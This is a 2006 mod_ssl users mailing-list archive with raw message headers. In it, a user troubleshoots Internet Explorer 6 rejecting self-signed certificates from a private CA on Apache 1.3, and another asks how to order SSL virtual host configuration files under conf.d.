Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id D048C64198
	for ; Sat,  7 Oct 2006 08:05:58 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id OdlRX8MH24Vi for ;
	Sat,  7 Oct 2006 08:05:57 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 854CE64045
	for ; Sat,  7 Oct 2006 08:05:57 +0300 (EEST)
Received: from 82.76.22.104 (proxying for 10.84.99.92)
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Sat, 7 Oct 2006 08:05:57 +0300 (EEST)
Message-ID: <13852.82.76.22.104.1160197557.squirrel@193.226.82.7>
In-Reply-To: <2629CC4E1D22A64593B02C43E855530301480759@USILMS12.ca.com>
References:  <2629CC4E1D22A64593B02C43E855530301480759@USILMS12.ca.com>
Date: Sat, 7 Oct 2006 08:05:57 +0300 (EEST)
Subject: RE: Encrypted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry, forgot to mention. Yes, all are XP, different configurations, one
is company standard, but the others are just plain XP with updates, no
special builds, no special software.

> Which OS have you tried?  Were they all XP?  Windows 2000? ME? 98? 95?
> Is there any chance that the computers that you tried have a special
> build or some software installed that might be causing a problem? I've
> seen similar problems be caused by a particular company's standard
> desktop build.
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of BB
> Sent: Friday, October 06, 2006 11:18 AM
> To: modssl-users@modssl.org
> Subject: Re: Encripted page would not load into IE
>
> I made the tests with IE from at least 4 different computers, located in
> networks from 3 different ISP's.
>
> Yes, the connection is done, because ith shows up instantly with
> tail -f /var/log/apache/ssl_engine_log
>
>
>>> I am running Apache 1.3.37 and openssl 0.9.8b from Slackware-current
>>> packages. I set up a https virtual host that listens on the default
>>> address.
>>>
>>> My problem is that the encrypted pages don't load in IE 6. They are
>>> working just fine in Firefox.
>> 
>>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  7 07:10:25 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 617B714D87F; Sat,  7 Oct 2006 07:10:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id 2BE1D14D83A
	for ; Sat,  7 Oct 2006 07:10:25 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id AFC9A640A3
	for ; Sat,  7 Oct 2006 08:07:30 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id H0rGSRsv5sIn for ;
	Sat,  7 Oct 2006 08:07:28 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 2B9AB64045
	for ; Sat,  7 Oct 2006 08:07:28 +0300 (EEST)
Received: from 82.76.22.104 (proxying for 10.84.99.92)
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Sat, 7 Oct 2006 08:07:28 +0300 (EEST)
Message-ID: <22042.82.76.22.104.1160197648.squirrel@193.226.82.7>
In-Reply-To: <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
    <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
    <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
Date: Sat, 7 Oct 2006 08:07:28 +0300 (EEST)
Subject: Re: Encripted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


>> I made the tests with IE from at least 4 different computers, located in
>> networks from 3 different ISP's.
>>
>> Yes, the connection is done, because ith shows up instantly with
>> tail -f /var/log/apache/ssl_engine_log
>
> Sounds weird. You could try installing an HTTP capture tool like IE Watch
> and seeing if that gives any useful info.

Thanks fot he suggestion. I'll try and keep you posted!

Regards,
BBR

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 10 11:03:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6DA4314D899; Tue, 10 Oct 2006 11:03:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sprbodj.inma.ucl.ac.be (sprbodj.inma.ucl.ac.be [130.104.239.239])
	by master.modssl.org (Postfix) with ESMTP id A236814D833
	for ; Tue, 10 Oct 2006 11:03:18 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by sprbodj.inma.ucl.ac.be (Postfix) with ESMTP id BE5A819C82A8
	for ; Tue, 10 Oct 2006 11:03:06 +0200 (CEST)
X-Virus-Scanned: amavisd-new at csam.ucl.ac.be
Received: from sprbodj.inma.ucl.ac.be ([127.0.0.1])
	by localhost (sprbodj.inma.ucl.ac.be [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id bzC48nrvL23k for ;
	Tue, 10 Oct 2006 11:03:05 +0200 (CEST)
Received: from [130.104.239.193] (pc-khorbiyong.inma.ucl.ac.be [130.104.239.193])
	by sprbodj.inma.ucl.ac.be (Postfix) with ESMTP id A21BD19C81FF
	for ; Tue, 10 Oct 2006 11:03:05 +0200 (CEST)
Message-ID: <452B61C9.6050507@inma.ucl.ac.be>
Date: Tue, 10 Oct 2006 11:03:05 +0200
From: Yannick Majoros 
Organization: UCL/FSA/INMA-MEMA
User-Agent: Thunderbird 2.0a1 (Windows/20060724)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: apache configuration and mod_ssl
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms020400000003070804030409"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Yannick Majoros 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms020400000003070804030409
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: quoted-printable

 Hello,

 We have some problem with the configuration of apache.

 We have a couple of virtual hosts (about 10), many of them which use=20
ssl. We have been maintaining them for a couple of years, and although=20
we can make them work, I don't like the way we do it now.

 As I understand, all virtual hosts configuration files should be in=20
/etc/httpd/conf.d . The problem is that most of our virtual hosts use=20
mod_ssl, and that ssl.conf is itself not loaded first. As such, every=20
virtual host whose name is alphabetically before ssl.conf cannot use=20
ssl, as the "Listen 443" directive is in ssl.conf. The solution we found =

was to move all virtual hosts in /etc/httpd/conf.d/vhosts/ . This works, =

but everytime a package as "subversion" gets updated, it creates a new=20
file in /etc/httpd/conf.d/ , duplicating the virtual hosts and causing=20
problems.

 What can we do to get things work, to be able to have standard packages =

updating themselves and to do things in a standard way? We use httpd=20
2.2.2 (standard package) on fedora core 5.

 Regards,

--=20
----------------------------------------------------------------------
Yannick Majoros http://www.inma.ucl.ac.be/~majoros
Informaticien UCL/INMA-MEMA
4, avenue G. Lema=C3=AEtre
B-1348 Louvain-la-Neuve
Tel: +32-10-47.80.10
Fax: +32-10-47.21.80
----------------------------------------------------------------------
Mon calendrier en ligne : http://www.inma.ucl.ac.be/~majoros/calendar
Accents bizarres ? http://www.inma.ucl.ac.be/~majoros/email.html
----------------------------------------------------------------------




--------------ms020400000003070804030409
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

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
dmljZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBDQTEr
MCkGCSqGSIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw0wMzA3MTcw
MDAwMDBaFw0xMzA3MTYyMzU5NTlaMGIxCzAJBgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUg
Q29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1h
aWwgSXNzdWluZyBDQTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAxKY8VXNV+065ypla
HmjAdQRwnd/p/6Me7L3N9VvyGna9fww6YfK/Uc4B1OVQCjDXAmNaLIkVcI7dyfArhVqqP3FW
y688Cwfn8R+RNiQqE88r1fOCdz0Dviv+uxg+B79AgAJk16emu59l0cUqVIUPSAR/p7bRPGEE
QB5kGXJgt/sCAwEAAaOBlDCBkTASBgNVHRMBAf8ECDAGAQH/AgEAMEMGA1UdHwQ8MDowOKA2
oDSGMmh0dHA6Ly9jcmwudGhhd3RlLmNvbS9UaGF3dGVQZXJzb25hbEZyZWVtYWlsQ0EuY3Js
MAsGA1UdDwQEAwIBBjApBgNVHREEIjAgpB4wHDEaMBgGA1UEAxMRUHJpdmF0ZUxhYmVsMi0x
MzgwDQYJKoZIhvcNAQEFBQADgYEASIzRUIPqCy7MDaNmrGcPf6+svsIXoUOWlJ1/TCG4+DYf
qi2fNi/A9BxQIJNwPP2t4WFiw9k6GX6EsZkbAMUaC4J0niVQlGLH2ydxVyWN3amcOY6MIE9l
X5Xa9/eH1sYITq726jTlEBpbNU1341YheILcIRk13iSx0x1G/11fZU8xggNkMIIDYAIBATB2
MGIxCzAJBgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQu
MSwwKgYDVQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQQIQLRCGQOrC
4LZvIn5KDLZkXTAJBgUrDgMCGgUAoIIBwzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwG
CSqGSIb3DQEJBTEPFw0wNjEwMTAwOTAzMDVaMCMGCSqGSIb3DQEJBDEWBBS0Tk8jdcc6Yti0
//rbrkQTYHPXyjBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIA
gDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDCBhQYJKwYBBAGCNxAE
MXgwdjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkg
THRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECEC0Q
hkDqwuC2byJ+Sgy2ZF0wgYcGCyqGSIb3DQEJEAILMXigdjBiMQswCQYDVQQGEwJaQTElMCMG
A1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBl
cnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECEC0QhkDqwuC2byJ+Sgy2ZF0wDQYJKoZIhvcN
AQEBBQAEggEAXT3wKfMf5f/rRR/0YCvbWvqj7hOQyFQGBclRTI7Mlyk1jARAW6F0P/uCg0pJ
K3SePA1GrSMrhsr3d9wE7O147IT5FbajPMBrhCECJJ48VYJ5dHmTDN6Sg7MUG6GupjuPQhTR
PSO8yf33qYKYLOeTHTkM7BnNVtW2cpePkc/QcHh/2AndujtVi4Hbrt7GoAazdjMK1OQ+2eAn
pgZV3n76ayX9pjhluEjRvijvYJGVOxqRPQlUonN8rRs5vQUKJh02ayN6cw3sCD+Ad0AIxqlR
KxPLPv3a69hdRtmxN5T9A4GdlCT6FBB9qTTqZq2ox3J3gO45JTeWqW4BtjH1wyf8AwAAAAAA
AA==
--------------ms020400000003070804030409--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 10 11:46:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CE8D514D899; Tue, 10 Oct 2006 11:46:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id B912614D833
	for ; Tue, 10 Oct 2006 11:46:45 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 32EEF6404E
	for ; Tue, 10 Oct 2006 12:43:49 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id 8rjQRrnJ-LZM for ;
	Tue, 10 Oct 2006 12:43:48 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 0930E64047
	for ; Tue, 10 Oct 2006 12:43:48 +0300 (EEST)
Received: from 84.243.98.130
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Tue, 10 Oct 2006 12:43:48 +0300 (EEST)
Message-ID: <1443.84.243.98.130.1160473428.squirrel@193.226.82.7>
In-Reply-To: <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
    <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
    <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
Date: Tue, 10 Oct 2006 12:43:48 +0300 (EEST)
Subject: Re: Encripted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apparently, it's someting wrong with the certificates, as IE Watch gets:

ERROR_INTERNET_SEC_INVALID_CERT

What could this be? Firefox works just fine with these certs. Additionaly,
pop3s and imaps from Dovecot work fine with the same certs, even with MS
Outlook and Outlook Express clients.

It's a self created CA, with self signed certificates.

Any suggestions for what should I check further?

Thank you in advance!

BBR


> BB said:
>> I made the tests with IE from at least 4 different computers, located in
>> networks from 3 different ISP's.
>>
>> Yes, the connection is done, because ith shows up instantly with
>> tail -f /var/log/apache/ssl_engine_log
>>
>>
>
> Sounds weird. You could try installing an HTTP capture tool like IE Watch
> and seeing if that gives any useful info.
>
> --
> Michael Pacey
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 10 12:05:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2ECD214D89A; Tue, 10 Oct 2006 12:05:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id CC32B14D833
	for ; Tue, 10 Oct 2006 12:05:37 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 968C76404E
	for ; Tue, 10 Oct 2006 13:02:41 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id m0WLkOTm2+0c for ;
	Tue, 10 Oct 2006 13:02:40 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 4B64464047
	for ; Tue, 10 Oct 2006 13:02:40 +0300 (EEST)
Received: from 84.243.98.130
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Tue, 10 Oct 2006 13:02:40 +0300 (EEST)
Message-ID: <1572.84.243.98.130.1160474560.squirrel@193.226.82.7>
In-Reply-To: <1443.84.243.98.130.1160473428.squirrel@193.226.82.7>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
    <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
    <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
    <1443.84.243.98.130.1160473428.squirrel@193.226.82.7>
Date: Tue, 10 Oct 2006 13:02:40 +0300 (EEST)
Subject: Re: Encripted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I tried also to install the certificate of the CA in the Trusted Root
Certification Authorities folder. It says Import Successfull, but my CA
doesn't show up in the list.

Any hints?

> Apparently, it's someting wrong with the certificates, as IE Watch gets:
>
> ERROR_INTERNET_SEC_INVALID_CERT
>
> What could this be? Firefox works just fine with these certs. Additionaly,
> pop3s and imaps from Dovecot work fine with the same certs, even with MS
> Outlook and Outlook Express clients.
>
> It's a self created CA, with self signed certificates.
>
> Any suggestions for what should I check further?
>
> Thank you in advance!
>
> BBR
>
>
>> BB said:
>>> I made the tests with IE from at least 4 different computers, located
>>> in
>>> networks from 3 different ISP's.
>>>
>>> Yes, the connection is done, because ith shows up instantly with
>>> tail -f /var/log/apache/ssl_engine_log
>>>
>>>
>>
>> Sounds weird. You could try installing an HTTP capture tool like IE
>> Watch
>> and seeing if that gives any useful info.
>>
>> --
>> Michael Pacey
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 10 12:21:13 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8DE5E14D899; Tue, 10 Oct 2006 12:21:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id 4B53514D833
	for ; Tue, 10 Oct 2006 12:21:12 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id E6D4664057
	for ; Tue, 10 Oct 2006 13:18:16 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id 4E+bSQ+SsjM4 for ;
	Tue, 10 Oct 2006 13:18:15 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 71E066404E
	for ; Tue, 10 Oct 2006 13:18:15 +0300 (EEST)
Received: from 84.243.98.130
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Tue, 10 Oct 2006 13:18:15 +0300 (EEST)
Message-ID: <1646.84.243.98.130.1160475495.squirrel@193.226.82.7>
In-Reply-To: <1572.84.243.98.130.1160474560.squirrel@193.226.82.7>
References: <15704.82.76.22.104.1160146265.squirrel@193.226.82.7>
    <36581.127.0.0.1.1160146309.squirrel@sydb.dyndns.org>
    <36046.82.76.22.104.1160147882.squirrel@193.226.82.7>
    <36686.127.0.0.1.1160152280.squirrel@sydb.dyndns.org>
    <1443.84.243.98.130.1160473428.squirrel@193.226.82.7>
    <1572.84.243.98.130.1160474560.squirrel@193.226.82.7>
Date: Tue, 10 Oct 2006 13:18:15 +0300 (EEST)
Subject: Re: Encripted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry, my mistake. The CA shows up in the list, but I get still the same
error.

> I tried also to install the certificate of the CA in the Trusted Root
> Certification Authorities folder. It says Import Successfull, but my CA
> doesn't show up in the list.
>
> Any hints?
>
>> Apparently, it's someting wrong with the certificates, as IE Watch gets:
>>
>> ERROR_INTERNET_SEC_INVALID_CERT
>>
>> What could this be? Firefox works just fine with these certs.
>> Additionaly,
>> pop3s and imaps from Dovecot work fine with the same certs, even with MS
>> Outlook and Outlook Express clients.
>>
>> It's a self created CA, with self signed certificates.
>>
>> Any suggestions for what should I check further?
>>
>> Thank you in advance!
>>
>> BBR
>>
>>
>>> BB said:
>>>> I made the tests with IE from at least 4 different computers, located
>>>> in
>>>> networks from 3 different ISP's.
>>>>
>>>> Yes, the connection is done, because ith shows up instantly with
>>>> tail -f /var/log/apache/ssl_engine_log
>>>>
>>>>
>>>
>>> Sounds weird. You could try installing an HTTP capture tool like IE
>>> Watch
>>> and seeing if that gives any useful info.
>>>
>>> --
>>> Michael Pacey
>>>
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>>
>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 10 12:49:45 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9D9A514D89D; Tue, 10 Oct 2006 12:49:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
